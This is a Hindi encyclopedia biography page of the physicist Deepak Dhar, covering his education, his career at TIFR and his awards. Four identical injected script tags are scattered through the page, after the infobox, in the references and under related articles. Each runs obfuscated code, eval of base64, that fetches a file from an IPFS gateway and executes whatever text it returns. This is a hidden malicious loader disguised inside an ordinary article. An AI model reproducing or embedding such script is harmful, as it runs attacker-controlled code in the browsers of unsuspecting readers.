दीपक धर  

दीपक धर
पूरा नाम दीपक धर
जन्म 30 अक्टूबर, 1951
जन्म भूमि ज़िला पतापगढ़, उत्तर प्रदेश
अभिभावक पिता- मुरली धर
कर्म भूमि भारत
शिक्षा विज्ञान स्नातक, इलाहाबाद विश्वविद्यालय

भौतिकी स्नातकोत्तार, भारतीय प्रौद्योगिकी संस्थान, कानपुर
पीएचडी, कैलिफ़ोर्निया इंस्टीट्यूट ऑफ़ टेक्नोलॉजी

पुरस्कार-उपाधि पद्म भूषण, 2023

अंतरराष्ट्रीय बोल्ट्जमान पदक, 2022
सत्येंद्रनाथ बोस पुरस्कार, 2001
शांति स्वरूप भटनागर पुरस्कार, 1991

प्रसिद्धि भारतीय भौतिक विज्ञानी
नागरिकता भारतीय
अन्य जानकारी अमेरिका के कैलिफोर्निया विश्वविद्यालय से पीएचडी करने वाले प्रो. दीपक धर इलाहाबाद हाईकोर्ट के न्यायमूर्ति मुरली धर के इकलौते पुत्र हैं। न्यायमूर्ति मुरली धर 1990-1991 में इलाहाबाद हाईकोर्ट बार एसोसिएशन के अध्यक्ष भी रहे।
अद्यतन‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

दीपक धर (अंग्रेज़ी: Deepak Dhar, जन्म- 30 अक्टूबर, 1951) भारतीय भौतिक विज्ञानी हैं। प्रोफेसर दीपक धर 'बोल्ट्जमान पदक' से सम्मानित होने वाले पहले भारतीय हैं। 'इंटरनेशनल यूनियन ऑफ प्योर एंड एप्लाइड फिजिक्स' के सांख्यिकीय भौतिकी पर आयोग सांख्यिकीय भौतिकी के क्षेत्र में योगदान के लिए तीन साल में एक बार यह पदक प्रदान करता है। भारत सरकार भौतिक विज्ञानी प्रोफेसर दीपक धर पद्म भूषण, 2023 से सम्मानित किया है।

परिचय

दिपक धर का जन्म 30 अक्टूबर 1951 को उत्तर प्रदेश के पतापगढ़ ज़िले में मुरलीधर रामगुप्ता दंपति के घर हुआ था। उन्होंने 1970 में इलाहाबाद विश्वविद्यालय से विज्ञान में स्त्रातक किया था। भारतीय प्रौद्योगिकी संस्थान, कानपुर से भौतिकी में स्नातकोत्तार की उपाधि प्राप्त की थी। फिर वे पीएचडी के लिए अमेरिका चले गए और पीएचडी पूरी करने के बाद 1978 में टाटा इंस्टीट्यूट ऑफ फंडामेंटल रिसर्च (टीआईएफआर) में रिसर्च फेलो के रूप में शामिल हो गए। उन्होंने वर्षों तक आईटीएफ़आर में पूर्णकालिक प्रोफेसर के रूप में काम किया और 2016 में सेवानिवृत्त हुए। तब से, वे एक विज़िटिंग फैकल्टी के रूप में पुणे में कार्य करते रहे।

पुरस्कार व सम्मान

पद्म भूषण, 2023 से विभूषित प्रो. दीपक धर का संगम के शहर की गलियों में उनका लंबा समय बीता है। पुणे स्थित भारतीय विज्ञान शिक्षा एवं अनुसंधान संस्थान में विजिटिंग फैकल्टी के तौर पर तैनात प्रो. दीपक धर ने 1970 में इलाहाबाद विश्वविद्यालय से बीएससी की थी। इसके बाद 1972 में आईआईटी कानपुर से भौतिकी में एमएससी की उपाधि हासिल की।[१]

अमेरिका के कैलिफोर्निया विश्वविद्यालय से पीएचडी करने वाले प्रो. दीपक धर इलाहाबाद हाईकोर्ट के न्यायमूर्ति मुरली धर के इकलौते पुत्र हैं। न्यायमूर्ति मुरली धर 1990-1991 में इलाहाबाद हाईकोर्ट बार एसोसिएशन के अध्यक्ष भी रहे। हालांकि पुत्र की इस उपलब्धि से तीन वर्ष पहले ही उनका निधन हो गया। न्यायमूर्ति मुरलीधर प्रतापगढ़ में मुंसफ मजिस्ट्रेट भी रहे। उसी दौरान बेल्हा में प्रोफेसर दीपक धर का जन्म हुआ था।

  • प्रो. दीपक धर को सांख्यिकीय भौतिक विज्ञान के क्षेत्र में योगदान के लिए 1991 में विज्ञानी और औद्योगिक अनुसंधान पुरषद ने 'शांति स्वरूप भटनागर पुरस्कार' से सम्मानित किया था।
  • वर्ष 2001 में आईएनएसए की ओर से उन्हें 'सत्येंद्रनाथ बोस पुरस्कार' से भी नवाजा गया था। इससे पहले उन्हें प्रतिष्ठित 'अंतरराष्ट्रीय बोल्ट्जमान पदक' से भी नवाजा जा चुका था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. पद्मभूषण सम्मान पाने वाले पुणे के वैज्ञानिक दीपक धर का संगमनगरी से गहरा नाता (हिंदी) amarujala.com। अभिगमन तिथि: 09 जुलाई, 2023।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=दीपक_धर&oldid=682933" से लिया गया